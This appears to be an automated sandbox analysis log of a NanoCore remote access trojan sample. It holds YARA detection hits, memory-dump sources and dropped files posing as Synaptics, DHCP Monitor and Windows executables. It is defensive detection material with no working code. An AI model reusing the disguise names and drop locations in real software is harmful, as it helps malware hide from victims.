            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000028.00000002.460036376.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000022.00000002.441431426.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001A.00000000.400197509.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001A.00000000.400197509.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001F.00000002.436004480.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001F.00000002.436004480.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000028.00000002.459917090.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000B.00000002.562031611.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000028.00000002.459034432.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000028.00000002.459034432.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000022.00000002.441940953.0000000004711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001F.00000002.440103209.0000000003F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001F.00000002.439646112.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001E.00000000.405483096.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001E.00000000.405483096.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: WINDOWS.EXE PID: 7016, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: WINDOWS.EXE PID: 7016, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6580, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6580, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6692, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6692, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: dhcpmon.exe PID: 5244, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: dhcpmon.exe PID: 5244, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPEDMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPEDMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 3668
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 0_2_00FCC0E40_2_00FCC0E4
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 0_2_00FCE5300_2_00FCE530
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 0_2_00FCE5200_2_00FCE520
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004601F04_2_004601F0
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0046C7CC4_2_0046C7CC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0048C7F44_2_0048C7F4
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0044EA404_2_0044EA40
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_00496E184_2_00496E18
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0046B1E44_2_0046B1E4
            Source: C:\Users\user\Desktop\SYSTEM32.EXECode function: 7_2_00DA5FB97_2_00DA5FB9
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_015DC0E48_2_015DC0E4
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_015DE5308_2_015DE530
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_015DE5208_2_015DE520
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_05B0E6B88_2_05B0E6B8
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_05B0C5688_2_05B0C568
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_05B026288_2_05B02628
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_05B0B1908_2_05B0B190
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_05B02DB88_2_05B02DB8
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_05B02DAB8_2_05B02DAB
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_05B0DBA08_2_05B0DBA0
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_060612688_2_06061268
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_06063B608_2_06063B60
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_060633F08_2_060633F0
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_06066F808_2_06066F80
            Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 8_2_0606FB888_2_0606FB88
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_004601F09_2_004601F0
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0046C7CC9_2_0046C7CC
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0048C7F49_2_0048C7F4
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0044EA409_2_0044EA40
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_00496E189_2_00496E18
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0046B1E49_2_0046B1E4
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0045FCC89_2_0045FCC8
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_00453DA49_2_00453DA4
            Source: WINDOWS.EXE.6.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeSection loaded: starttiledata.dllJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeSection loaded: starttiledata.dllJump to behavior
            Source: C:\Users\user\Desktop\WINDOWS.EXESection loaded: starttiledata.dllJump to behavior
            Source: C:\Users\user\Desktop\WINDOWS.EXESection loaded: starttiledata.dllJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: starttiledata.dll
            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: starttiledata.dll
            Source: y8kdmHi6x3.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
